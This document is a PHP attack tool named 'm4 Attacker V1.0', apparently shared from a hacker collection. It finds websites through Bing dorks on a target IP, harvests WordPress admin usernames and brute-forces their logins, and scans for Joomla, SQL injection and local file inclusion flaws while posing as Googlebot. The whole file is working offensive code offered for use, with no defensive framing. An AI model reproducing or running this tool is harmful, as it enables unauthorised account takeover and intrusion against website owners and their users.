attacker.php m4_Ghoul Collection [Exclusive]

1. <?php
2. #Hiroshima_Warriorz
3. #m4 Attacker V1.0
4. /*
5.     INJ3CTOR_M4
6.     (c) [email protected]
7.     MOROCCAN HAXORZ
8. */
9. @set_time_limit(0);
10. error_reporting(0);
11.  
12. $opt = getopt('r:w:p:j:s:f:i:l'); // getopt function
13. echo"
14.            _____      _____   __    __                 __                
15.  _____    /  |  |    /  _  \_/  |__/  |______    ____ |  | __ ___________
16. /     \  /   |  |_  /  /_\  \   __\   __\__  \ _/ ___\|  |/ // __ \_  __ \
17. |  Y Y  \/    ^   / /    |    \  |  |  |  / __ \\  \___|    <\  ___/|  | \/
18. |__|_|  /\____   |  \____|__  /__|  |__| (____  /\___  >__|_ \\___  >__|  
19.      \/      |__|          \/                \/     \/     \/    \/      
20.  
21. ";
22.  
23. if(isset($opt['r'])){
24.     $remoteAddress = $opt['r'];
25.     echo info_ip($remoteAddress); // print resultat
26. }elseif(isset($opt['w']) && isset($opt['p'])){  $passwords = list_get_contents($opt['p']);
27.     // Wordpress Grabber By INJ3CTOR_M4
28.    
29.     $ip = $opt['w'];
30.     $dork = "ip:$ip /?page_id=";
31.     $sites = bing_dorker($dork);
32.     foreach($sites as $site){
33.         // Check if WordPress
34.         if(eregi("page_id=", $site)){   $site = pathinfo($site)['dirname'];
35.             $data = get_source($site    .   "/wp-includes/wlwmanifest.xml");
36.             if(preg_match('#<clientType>WordPress</clientType>#i', $data)){
37.                 $wpLinks[] = $site;
38.             }
39.         }
40.     }
41.     if(!empty($wpLinks)){   $wpLinks = array_unique($wpLinks);
42.         foreach($wpLinks as $wordpress){    echo"\r\n[+] $wordpress :\r\n";
43.             $user=admin_wp($wordpress); // get admin username
44.             echo"\t[+] Username: $user\r\n";
45.             echo"\t[!] Trying " .   sizeof($passwords)  .   " Password, ";
46.             foreach($passwords as $pass){ // Load Passwords
47.                 $result=WP($wordpress, $user, $pass); // Start Bruteforce
48.                 if($result == true){
49.                     echo"\r\n\t[+] Cracked - Password: $pass\r\n";
50.                     break;
51.                 }
52.             }   echo"Finished - Not Cracked!\r\n";
53.         }
54.     }
55. }elseif(isset($opt['j'])){
56.     // Joomla Grabber By INJ3CTOR_M4
57.    
58.     $ip = $opt['j'];
59.     $dork = "ip:$ip index.php?option=com";
60.     $sites = bing_dorker($dork);
61.     foreach($sites as $site){
62.         // Check if Joomla
63.         if(preg_match('/option/', $site)){  $site = pathinfo($site)['dirname'];
64.             $data = get_source($site    .   "/administrator/index.php");
65.             if(preg_match('/Joomla!/', $data)){
66.                 $joomLinks[] = $site;
67.             }
68.         }
69.     }
70.     if(!empty($joomLinks)){ $joomLinks = array_unique($joomLinks);
71.         foreach($joomLinks as $joomla){ echo"\r\n[+] $joomla :\r\n";
72.             $composents=jos_composent($joomla); // Get Composents
73.             if(count($composents)>0){
74.                 foreach($composents as $composent){ // Load Composents
75.                     $result=ExpDB($composent); // Scan Composent
76.                     if($result == true){
77.                         echo"\t[+] $composent\tVulnerable!\r\n";
78.                     }else{  echo"\t[-] $composent\r\n"; }
79.                 }
80.             }else{  echo"\t[!] There is No Composent\r\n";  }
81.         }
82.     }
83. }elseif(isset($opt['s'])){
84.     // SQLi Server Scanner By INJ3CTOR_M4
85.    
86.     $ip = $opt['s'];
87.     $dorks = array('?id=', '.php?id=', '.php?category=', '.php?cat=', '.php?article_id=', '.php?product_id=', '?attachment_id=', '.php?num=', '.php?idProduct=', '.php?idCategory=', '.php?cartID=', '.php?catid=', '.php?item_id=', '.php?keyword=', '.php?Item=');
88.     foreach($dorks as $dork){
89.         $query = "ip:$ip $dork";
90.         $sites = bing_dorker($query);
91.         foreach($sites as $site){
92.             $data = get_source($site    .   "%27");
93.             if(preg_match("/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i", $data)){
94.                 echo"[+] $site Vulnerable!\r\n";
95.             }else{  echo"[-] $site Note Vulnerable!\r\n";   }
96.         }
97.     }
98. }elseif(isset($opt['f'])){
99.     // LFI Server Scanner By INJ3CTOR_M4
100.    
101.     $ip = $opt['f'];
102.     $dorks = array('.php?action=', '.php?act=', '.php?download=', '.php?file=', '.php?filename=', '.php?f=', '.php?page=', '.php?pg=', '.php?pagina=', '.php?main=', '.php?viewpage=', '.php?show=', '.php?lang=', '.php?language=', '.php?logon=', '.php?c=', '.php?topic=', '.php?go=');
103.     foreach($dorks as $dork){
104.         $query = "ip:$ip $dork";
105.         $sites = bing_dorker($query);
106.         foreach($sites as $site){
107.             $url = _Fix($site);
108.             $data = get_source($url .   '__m4__');
109.             if(preg_match("/failed to open stream/i", $data)){ // scan if vulnerable
110.                 echo"[+] $url Vulnerable!\r\n";
111.             }else{  echo"[-] $site Note Vulnerable!\r\n";   }
112.         }
113.     }
114. }elseif(isset($opt['i']) && isset($opt['l'])){  $list = list_get_contents($opt['l']);
115.     $ip = $opt['i'];
116.     // Reverse iP By INJ3CTOR_M4
117.    
118.     $allLinks = bing_dorker($ip);
119.     foreach($allLinks as $link){
120.         $site = parse_url ($link);
121.         $sites[] = $site['scheme']."://".$site['host'];
122.     }
123.     $sites = array_unique($sites); // unique resultat
124.     $ch = curl_init();
125.     foreach($sites as $site){ // load websites
126.         foreach($list as $path){ // load path list
127.             curl_setopt($ch, CURLOPT_URL, $site.$path);
128.             curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
129.             curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; pt-pt) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27");
130.             curl_setopt($ch, CURLOPT_NOBODY, true);
131.             curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
132.             curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
133.             curl_setopt($ch, CURLOPT_VERBOSE, false);
134.             curl_setopt($ch, CURLOPT_TIMEOUT, 5);
135.             curl_exec($ch);
136.             if(curl_getinfo($ch, CURLINFO_HTTP_CODE) == 200){ // check if found or not
137.                 echo"[+] $site$path ...Ok!\r\n";
138.             }
139.         }
140.     }
141. }else{
142.     echo"\r\n[!] OPTIONS:\r\n\t -r Get Server iP Informations\r\n\t -w [127.0.0.1] -p pass.txt // Wordpress Server Bruteforcer\r\n\t -j Joomla Server Scanner\r\n\t -s SQLi Server Scanner\r\n\t -f LFI Server Scanner\r\n\t -i [127.0.0.1] -l path.txt // Server Path Scanner\r\n";
143. }
144.  
145. // iP Information Grabber Function By INJ3CTOR_M4
146. function info_ip($ip){
147.     $result .="\r\n==========================================================\r\n";
148.     $result .="[*] remoteAddress    :   {$ip}\r\n";
149.     $data = json_decode(file_get_contents("http://ip-api.com/json/" .   $ip));
150.     if($data->{"status"} != "fail"){
151.         $result .="[*] country  :   "   .   $data->{"country"}  .   "\r\n";
152.         $result .="[*] ISP NAME :   "   .   $data->{"isp"}  .   "\r\n";
153.     }
154.     $ch = curl_init();
155.     curl_setopt($ch, CURLOPT_URL, 'http://domains.yougetsignal.com/domains.php');
156.     curl_setopt($ch, CURLOPT_POST, 1);
157.     curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress="   .   $ip);
158.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
159.     $data = json_decode(curl_exec($ch));
160.     curl_close($ch);
161.     if($data->{"status"} != "Fail"){
162.         $result .="[*] domainCount  :   "   .$data->{"domainCount"} .   "\r\n";
163.     }
164.     if(fsockopen($ip, 80)){
165.         $data = get_source("http://$ip/");
166.         if(preg_match("#<title>(.*?)</title>#i", $data, $matches)){
167.             $result .="[*] title    :   {$matches['1']}"    .   "\r\n";
168.         }
169.     }elseif(fsockopen($ip, 443)){
170.         $data = get_source("https://$ip/");
171.         if(preg_match("#<title>(.*?)</title>#i", $data, $matches)){
172.             $result .="[*] title    :   {$matches['1']}"    .   "\r\n";
173.         }
174.     }
175.     $result .="==========================================================\r\n";
176.    
177.     return $result;
178. }
179.  
180. function bing_dorker($dork){
181.     $ch = curl_init();
182.     $i = 1;
183.     while($i){
184.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
185.         curl_setopt($ch, CURLOPT_URL, "http://www.bing.com/search?q="   .   urlencode($dork)    .   "&first={$i}");
186.         curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
187.         curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
188.         curl_setopt($ch, CURLOPT_USERAGENT, "SamsungI8910/SymbianOS/9.1 Series60/3.0");
189.         curl_setopt($ch, CURLOPT_ENCODING, "gzip, deflate, compress");
190.         $data = curl_exec($ch);
191.         preg_match_all('#<h2 class="sb_h3 cttl"><a href="(.*?)"#i', $data, $matches);
192.         foreach($matches[1] as $link){
193.             $allLinks[] = $link;
194.         }
195.         if(!preg_match('#class="sb_pagN"#i', $data)) break;
196.         $i+=10;
197.     }
198.     curl_close($ch);
199.     if(!empty($allLinks) && is_array($allLinks)){
200.         return array_unique($allLinks);
201.     }
202. }
203.  
204. function list_get_contents($file){
205.     $data = file($file);
206.     return array_unique(array_map("trim", $data));
207. }
208.  
209. function admin_wp($wp){
210.     $data = get_source($wp    .    "/?feed=atom");
211.     if(preg_match('#<name>(.*?)</name>#', $data, $user)){
212.         if(strlen($user[1]) > 0 && strlen($user[1]) <= 15){
213.             return $user[1];
214.         }
215.     }else{
216.         $data = get_source($wp    .    "/?author=1");
217.         if(preg_match('#<body class="archive author author-(.*?) author-(.*?)(.*)">#i', $data, $user)){
218.             return $user[1];
219.         }else{
220.             return "admin";
221.         }
222.     }
223. }
224.  
225. function WP($site, $user, $pass){
226.     $ch = curl_init();
227.     $to = $site    .    "/wp-admin/";
228.     curl_setopt($ch, CURLOPT_URL, $site    .    "/wp-login.php");
229.     curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
230.     curl_setopt($ch, CURLOPT_USERAGENT, "Googlebot/2.1 (+http://www.google.com/bot.html)");
231.     curl_setopt($ch, CURLOPT_COOKIE, "wordpress_test_cookie=WP+Cookie+check");
232.     curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd()    .    '/cookie.txt');
233.     curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd()    .    '/cookie.txt');
234.     curl_setopt($ch, CURLOPT_POST, 1);
235.     curl_setopt($ch, CURLOPT_POSTFIELDS, "log=".$user."&pwd=".$pass."&wp-submit=Log+In&redirect_to=".$to."&testcookie=1");
236.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
237.     curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
238.     $data = curl_exec($ch);
239.     return (preg_match('/logout/', $data)) ? true:false;
240. }
241.  
242. function jos_composent($url){
243.   $source = get_source($url);
244.   preg_match_all('{option,(.*?)/}i', $source, $f);
245.   preg_match_all('{option=(.*?)(&amp;|&|")}i', $source, $f2);
246.   preg_match_all('{/components/(.*?)/}i', $source, $f3);
247.   return cln_arr(@ array_merge($f2[1], $f[1], $f3[1]));
248. }
249.  
250. function cln_arr($array){
251.   return @ array_filter(@ array_unique($array));
252. }
253.  
254. function ExpDB($Bug){
255.     $ghdb = "http://www.exploit-db.com/search/?action=search&filter_exploit_text=";
256.     return (!preg_match("/No results/", get_source($ghdb    .   $Bug))) ? true:false;
257. }
258.  
259. function _Fix($site){ preg_match_all("#(.*?)?(.*?)=(.*?)#", $site, $res); return $res[2][0]."="; }
260.  
261. function get_source($link, $agent=false){
262.     if(!$agent){ $agent='Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'; }
263.     if(!function_exists('curl_init')){
264.         return file_get_contents($link);
265.     }else{
266.         $ch = curl_init();
267.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
268.         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
269.         curl_setopt($ch, CURLOPT_URL, $link);
270.         curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
271.         curl_setopt($ch, CURLOPT_USERAGENT, $agent);
272.         curl_setopt($ch, CURLOPT_ENCODING, 0);
273.         curl_setopt($ch, CURLOPT_TIMEOUT, 30);
274.         $data = curl_exec($ch);
275.         curl_close($ch);
276.        
277.         return $data;
278.     }
279. }